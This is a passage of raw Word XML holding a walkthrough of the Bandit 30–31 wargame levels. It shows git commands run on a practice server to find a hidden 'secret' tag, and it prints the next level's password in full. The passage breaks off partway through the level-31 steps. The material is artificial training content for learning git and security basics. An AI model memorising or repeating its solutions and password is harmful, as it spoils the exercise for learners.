    <w:p w14:paraId="16C77A78" w14:textId="77777777" w:rsidR="00CB49F1" w:rsidRPr="00CB49F1" w:rsidRDefault="00CB49F1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B49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Total 4 (delta 0), reused 0 (delta 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63286BCA" w14:textId="7DB20E41" w:rsidR="00CB49F1" w:rsidRPr="00CB49F1" w:rsidRDefault="00CB49F1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CB49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receiving objects: 100% (4/4), done.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B52EFA3" w14:textId="32D9CA73" w:rsidR="00263638" w:rsidRDefault="00263638" w:rsidP="002E0545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04B63D53" w14:textId="13C7D760" w:rsidR="00CB49F1" w:rsidRDefault="00CB49F1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moved to the folder (using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cd /tmp/samuelGit4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">) and displayed Its content using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. There was a single file named </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and within it was the string (</w:t>
      </w:r>
      <w:r w:rsidR="005F1B15">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“just an epmty file... muahaha”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B3FE3C" w14:textId="2D016F2D" w:rsidR="00CB49F1" w:rsidRDefault="00CB49F1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3005205C" w14:textId="77777777" w:rsidR="00D40119" w:rsidRDefault="00692C5C" w:rsidP="008528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After several checks (with branches and commits) I decided to go to the .git folder (you can see it with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00692C5C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="008528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> saw that inside the </w:t>
      </w:r>
      <w:r w:rsidR="008528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>packed-refs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(using the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A0DF5F" w14:textId="0785B889" w:rsidR="00692C5C" w:rsidRDefault="008528E1" w:rsidP="008528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D40119">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat .git/packed-refs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>) there are a ref that was not fetched:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F89086" w14:textId="77777777" w:rsidR="008528E1" w:rsidRPr="008528E1" w:rsidRDefault="00692C5C" w:rsidP="008528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B074DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008528E1" w:rsidRPr="008528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># pack-refs with: peeled fully-peeled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD5D50" w14:textId="77777777" w:rsidR="008528E1" w:rsidRPr="008528E1" w:rsidRDefault="008528E1" w:rsidP="008528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8528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3aa4c239f729b07deb99a52f125893e162daac9e refs/remotes/origin/master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367A9F1" w14:textId="6F69D55C" w:rsidR="00692C5C" w:rsidRDefault="008528E1" w:rsidP="008528E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8528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret</w:t>
      </w:r>
      <w:r w:rsidR="00692C5C" w:rsidRPr="00B074DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B074DD" w:rsidRPr="008528E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A363498" w14:textId="508CA322" w:rsidR="00D40119" w:rsidRDefault="00D40119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4A7B7022" w14:textId="3232127F" w:rsidR="00D40119" w:rsidRPr="00D40119" w:rsidRDefault="00D40119" w:rsidP="00D40119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after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40119">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tags from google: “Tags are ref's that point to specific points in Git history. Tagging is generally used to capture a point in history that is used for a marked version release (i.e. v1.0.1). A tag is like a branch that doesn't change. Unlike branches, tags, after being created, have no further history of commits.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5B2A88" w14:textId="25B41BD1" w:rsidR="00D40119" w:rsidRPr="00D40119" w:rsidRDefault="00D40119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With the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00D40119">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">git show f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>i got the next level password: “</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk21979707"/>
      <w:r w:rsidRPr="00D40119">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>47e603bb428404d265f59c42920d81e5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020437D" w14:textId="77777777" w:rsidR="00D40119" w:rsidRDefault="00D40119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47200379" w14:textId="74ADAEF0" w:rsidR="00D40119" w:rsidRDefault="00FD7ECD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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7ECD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">[Notice: another option to see all refs and tags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7ECD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>using the command: git show-ref]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C13D1" w14:textId="3773024A" w:rsidR="00FD7ECD" w:rsidRDefault="00FD7ECD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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522BA254" w14:textId="6EFF5B5C" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5560D95F" w14:textId="7F800293" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEFC546" w14:textId="457002A5" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7522434A" w14:textId="3E7C556F" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E65E5D" w14:textId="1ABEE3DD" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2838531A" w14:textId="13D8E0AB" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022FB9E5" w14:textId="7BFB3B63" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6261A0F9" w14:textId="5669662B" w:rsidR="009F4B44" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2481672D" w14:textId="77777777" w:rsidR="009F4B44" w:rsidRPr="00FD7ECD" w:rsidRDefault="009F4B44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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF8A306" w14:textId="0E033A0E" w:rsidR="00356B01" w:rsidRPr="00356B01" w:rsidRDefault="00356B01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356B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7F068" w14:textId="3FD6F287" w:rsidR="00CB49F1" w:rsidRPr="00672FA6" w:rsidRDefault="00672FA6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created a folder using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00672FA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuelGit5</w:t>
      </w:r>
      <w:r w:rsidRPr="00672FA6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 xml:space="preserve">and cloned the repository within it: </w:t>
      </w:r>
      <w:r w:rsidRPr="00672FA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git clone ssh://bandit31-git@localhost/home/bandit31-git/repo /tmp/samuelGit5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D9BEE" w14:textId="3C07C371" w:rsidR="00672FA6" w:rsidRDefault="00672FA6" w:rsidP="00CB49F1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I entered the password (</w:t>
      </w:r>
      <w:r w:rsidRPr="00672FA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>47e603bb428404d265f59c42920d81e5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>) and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17842122" w14:textId="77777777" w:rsidR="00672FA6" w:rsidRPr="00672FA6" w:rsidRDefault="00672FA6" w:rsidP="00672FA6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672FA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“remote: Counting objects: 4, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7D903" w14:textId="77777777" w:rsidR="00672FA6" w:rsidRPr="00672FA6" w:rsidRDefault="00672FA6" w:rsidP="00672FA6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672FA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Compressing objects: 100% (3/3), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D22C1" w14:textId="77777777" w:rsidR="00672FA6" w:rsidRPr="00672FA6" w:rsidRDefault="00672FA6" w:rsidP="00672FA6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672FA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Total 4 (delta 0), reused 0 (delta 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2563608C" w14:textId="6C62E75E" w:rsidR="00672FA6" w:rsidRDefault="00672FA6" w:rsidP="00672FA6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672FA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receiving objects: 100% (4/4), done.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2952EDCC" w14:textId="6D796D45" w:rsidR="009561D2" w:rsidRDefault="009561D2" w:rsidP="00672FA6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4BB30D28" w14:textId="4FA11AD6" w:rsidR="00C44167" w:rsidRDefault="009C23E9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entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cd /tmp/samuelGit5</w:t>
      </w:r>
      <w:r w:rsidRPr="009C23E9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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00A23521">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>with the command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="00A23521">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A23521" w:rsidRPr="00A23521">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00A23521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 xml:space="preserve">saw there was a single file named </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C44167">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">With the command </w:t>
      </w:r>
      <w:r w:rsidR="00C44167" w:rsidRPr="00C44167">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat README.md</w:t>
      </w:r>
      <w:r w:rsidR="00C44167" w:rsidRPr="00C44167">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C44167">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I saw the context of the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7067126E" w14:textId="40D8CCB2" w:rsidR="00A45C3B" w:rsidRPr="00A45C3B" w:rsidRDefault="00C44167" w:rsidP="00A45C3B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A45C3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00A45C3B" w:rsidRPr="00A45C3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This time your task is to push a file to the remote repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3AFDB2" w14:textId="77777777" w:rsidR="00A45C3B" w:rsidRPr="00A45C3B" w:rsidRDefault="00A45C3B" w:rsidP="00A45C3B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A45C3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2379B2" w14:textId="77777777" w:rsidR="00A45C3B" w:rsidRPr="00A45C3B" w:rsidRDefault="00A45C3B" w:rsidP="00A45C3B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A45C3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    File name: key.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0067F3" w14:textId="77777777" w:rsidR="00A45C3B" w:rsidRPr="00A45C3B" w:rsidRDefault="00A45C3B" w:rsidP="00A45C3B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A45C3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    Content: 'May I come in?'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB51D74" w14:textId="19A0974B" w:rsidR="00C44167" w:rsidRPr="00A45C3B" w:rsidRDefault="00A45C3B" w:rsidP="00A45C3B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A45C3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    Branch: master</w:t>
      </w:r>
      <w:r w:rsidR="00C44167" w:rsidRPr="00A45C3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB76EAE" w14:textId="39ECD0DA" w:rsidR="00C44167" w:rsidRDefault="00C44167" w:rsidP="00672FA6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249D7CEB" w14:textId="45504A46" w:rsidR="00731DCE" w:rsidRDefault="0094290C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checked I was in the master branch (using the command </w:t>
      </w:r>
